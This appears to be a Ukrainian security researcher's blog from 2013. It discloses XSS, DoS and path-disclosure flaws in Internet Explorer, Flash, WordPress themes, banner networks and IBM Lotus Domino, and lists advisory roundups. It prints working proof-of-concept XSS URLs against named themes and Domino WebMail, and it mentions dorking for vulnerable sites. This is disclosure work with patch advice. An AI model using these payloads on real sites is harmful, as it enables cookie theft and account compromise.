Websecurity - Веб безпека

В записі Denial of Service в Internet Explorer я навів відео TheSecuritylab з вибиванням IE7. І 13.02.2013 я розробив експлоіт заснований на даному відео і дослідив дану уразливість в різних браузерах. Як я перевірив, вона також працює в IE6 та IE8.

Тому це Denial of Service уразливість в Internet Explorer 6, 7, 8. Це access violation.

DoS:

Браузер вибиває при рекурсивному включенні css-файла. Це відбувається через access violation (aka segmentation fault) в iexplore.exe. Щоб експлоіт спрацював в IE6 потрібно оновити сторінку.

Експлоіт:

IE_DoS_Exploit.html

Уразливі Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7
(7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) та попередні версії цих браузерів. IE9 не вразливий.

У березні, 28.03.2013, я знайшов Cross-Site Scripting уразливості в банерній мережі http://img.com.ua (на піддоменах). Про що найближчим часом сповіщу адміністрацію проекту.

В 2008-2010 роках я писав про численні банерні системи (українські й закордонні), що мають подібні уразливості. Проблема така ж сама як і випадку уразливостей в системах в phpAdsNew, OpenAds та OpenX.

У флеш банерах на піддоменах bbn.img.com.ua і bbnu.img.com.ua (і потенційно інших піддоменах), є XSS уразливість. Якщо вони зроблені згідно з рекомендаціями банерної системи, то можлива XSS атака (strictly social XSS) через параметр bn_url (при кліку на банер). Про подібну атаку я вже писав в статті XSS уразливості в 8 мільйонах флеш файлах.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий

На всіх піддоменах даного сайта є десятки тисяч флеш банерів. Не всі з них уразливі, є піддомени де жодна флешка не має таких уразливостей, але на зазначених піддоменах всі флешки уразливі.

В даній добірці уразливості в веб додатках:

• Novell GroupWise Agents Arbitrary File Retrieval (деталі)
• DALIM Dialog Server ‘logfile’ Local File Inclusion (деталі)
• libxslt vulnerabilities, as used in Google Chrome (деталі)
• Apache Commons FileUpload - Insecure examples (деталі)
• (0Day) HP SiteScope SOAP Call getSiteScopeConfiguration Remote Code Execution Vulnerability (деталі)
• OS Command Injection in CosCms (деталі)
• (0Day) HP SiteScope UploadFilesHandler Remote Code Execution Vulnerability (деталі)
• Arbitrary Files Reading in mnoGoSearch (деталі)
• (0Day) HP SiteScope SOAP Call create Remote Code Execution Vulnerability (деталі)
• Cross-site Scripting vulnerabilities in i-doit CMDB (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Events Manager, LeagueManager та Simply Poll. Для котрих з’явилися експлоіти. Events Manager - це плагін для управління та відображення подій, LeagueManager - це плагін для управління спортивними лігами, Simply Poll - це плагін для створення голосувань.

• Multiple XSS vulnerabilities in Events Manager WordPress plugin (деталі)
• WordPress LeagueManager 3.8 SQL Injection (деталі)
• WordPress Simply Poll 1.4.1 CSRF / XSS (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

02.03.2013

У січні, 27.01.2013, я виявив Denial of Service уразливість в Adobe Flash. Уразливим була остання на той момент версія флеш плеєра. Дана DoS спрацьовує при перегляді спеціальної флешки і призводить до краху операційної системи (BSOD). Про що вже повідомив розробникам додатку (ще у січні).

Adobe вже виправила дану уразливість в середині лютого. Але працівники компанії ще не завершили всі дослідження цієї DoS, тому публікація деталей затягнулася більше ніж на місяць.

Раніше я вже писав про DoS уразливість у Flash плагіні.

Детальна інформація про уразливість з’явиться пізніше, як тільки Adobe завершить свої дослідження.

03.04.2013

Ще минулого місяця я виклав відео, що демонструє цю DoS уразливість в Flash плагіні. Щоб стимулювати людей оновлювати свій флеш плагін.

Adobe Flash DoS BSOD

Це memory corruption (access violation) уразливість. Яка може використовуватися для BSOD та потенційно для віддаленого виконання коду. Дане відео я зробив у січні 2013 року.

Для атаки використовується флешка VideoJS Flash Component від Zencoder. Розробників цього відео плеєра я також сповістив ще на початку лютого.

Атака працює в браузерах Firefox та Opera (причому BSOD тільки в Firefox):

У Mozilla Firefox 15.0.1 і 18.0.1 - зависання браузера (який не можна навіть закрити) і BSOD системи.
У Mozilla Firefox 3.0.19 і 10.0.7 ESR - ніяких збоїв (все робить нормально).
У Opera 10.62 - зависання браузера (який можна закрити).

PoC/Exploit:

Adobe Flash DoS BSOD.rar

Для запуску експлоіта потрібно розмістити його на веб сервері (наприклад, на localhost), помістити поруч з poc.htm будь-який mp4-файл під іменем poc.mp4 та запустити htm-файл (на веб сервері). Та потрібно клікнути мишкою по зображенню динаміка або по полю відео плеєра.

Уразлива версія Adode Flash 11.5.502.146. Атака працює лише на відеокартах AMD/ATI. В версії 11.6.602.168 уразливість вже не працює. Адоб виправила її 12.02.2013 в своєму патчі APSB13-05, що виправив численні уразливості в флеш плеєрі. При цьому Адоб зробила це приховано не вказавши цю уразливість і не пославшись на мене. А після мого повідомлення наприкінці січня, вони 1,5 місяця “перевіряли” і з’їхали, що в них не повторюється ця уразливість (при тому, що я відтворив її на багатьох комп’ютерах з відеокартами ATI), що вони знати нічого не знають (дірка була випадково виправлена в APSB13-05) і ця DoS їх не стосується.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Terillion Reviews та Count Per Day. Для котрих з’явилися експлоіти. Terillion Reviews - це плагін для розміщення оглядів на сайті, Count Per Day - це плагін для ведення статистики відвідувань.

• Stored XSS in Terillion Reviews Wordpress Plugin (деталі)
• WordPress Counter Per Day 3.2.3 DoS / Path Disclosure (деталі)
• WordPress Count-Per-Day 3.2.5 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• RSA Adaptive Authentication (On-Premise) Information Disclosure Vulnerability (деталі)
• Fileutils ruby gem possible remote command execution and insecure file handling in /tmp (деталі)
• Visual Tools DVR multiple vulnerabilities (деталі)
• Cross-Site Scripting (XSS) in Geeklog (деталі)
• F5 FirePass SSL VPN 4xxx Series | Arbitrary URL Redirection (деталі)
• Multiple Vulnerabilities in Piwigo (деталі)
• MitM-vulnerability in Palo Alto Networks GlobalProtect (деталі)
• Multiple critical vulnerabilities in GroundWork Monitor Enterprise (part 1) (деталі)
• SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities (деталі)
• Multiple vulnerabilities in GroundWork Monitor Enterprise (part 2) (деталі)

У лютому, 20.02.2013, я знайшов Cross-Site Scripting та Full path disclosure уразливості в темах до WordPress, що містять ZeroClipboard.swf. Також знайшов одну тему, що містить і ZeroClipboard10.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard та про численні вразливі веб додатки з цією флешкою. Як я зазначав, це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в сотнях веб додатків.

Також вона міститься потенційно в сотнях плагінів для WordPress, про що я писав. А також в сотнях тем (шаблонів) для WordPress, включаючи теми зроблені на замовлення окремих сайтів. Серед них Montezuma, Striking, Couponpress, Azolla та Black and White. Та існує багато інших уразливих тем до WordPress з ZeroClipboard.

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в попередньому записі).

http://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Це дуже поширена флешка. Якщо при стандартному пошуку через Гугл дорки можна знайти десятки тисяч сайтів з ZeroClipboard.swf чи ZeroClipboard10.swf, то при пошуку по темах для WordPress можна знайти майже сто тисяч сайтів з цими флешками.

Full path disclosure (WASC-13):

Також всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/montezuma/

http://site/wp-content/themes/striking/

http://site/wp-content/themes/couponpress/

http://site/wp-content/themes/azolla/

http://site/wp-content/themes/black-and-white/

Вразливі наступні веб додатки з флешкою (всі версії даних тем для WP): Montezuma, Striking, Couponpress, Azolla, Black and White.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Responsive Logo Slideshow, Pretty Link та Comment Rating. Для котрих з’явилися експлоіти. Responsive Logo Slideshow - це плагін для створення слайдшоу, Pretty Link - це плагін для розміщення гарних лінок, Comment Rating - це плагін для створення рейтингів коментарів.

• Reflective/Stored XSS in Responsive Logo Slideshow Plugin Cross-Site Scripting Vulnerability (деталі)
• WordPress Pretty Link 1.6.3 Cross Site Scripting (деталі)
• WordPress Comment Rating 2.9.32 SQL Injection / Bypass (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У травні, 03.05.2012, під час пентесту, я виявив багато уразливостей в IBM Lotus Domino, зокрема численні Cross-Site Scripting. Про попередні уразливості в Lotus Domino я вже раніше повідомив IBM, а про нові дірки я повідомив розробникам у грудні.

Раніше я вже писав про уразливості в IBM Lotus Domino, що стосувалися Domino WebMail. До попередніх двох дірок, додам нові уразливості в WebMail.

Cross-Site Scripting (WASC-08):

Атака можлива через data: і vbscript: URI.

http://site/mail/x.nsf/CalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/WebInteriorCalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/ToDoFS?OpenFrameSet?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/WebInteriorToDoFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі Lotus Domino 8.5.4 та попередні версії. Як мені повідомили з IBM, дані уразливості будуть виправлені в Domino 9. І враховуючи, що він вже вийшов у березні, я оприлюднив дану інформацію. Також існує обхідний метод захисту від даних XSS через спеціальні налаштування веб сервера (що IBM навела в своєму advisory для вищезгаданих XSS уразливостей), що можуть використати користувачі попередніх версій Domino.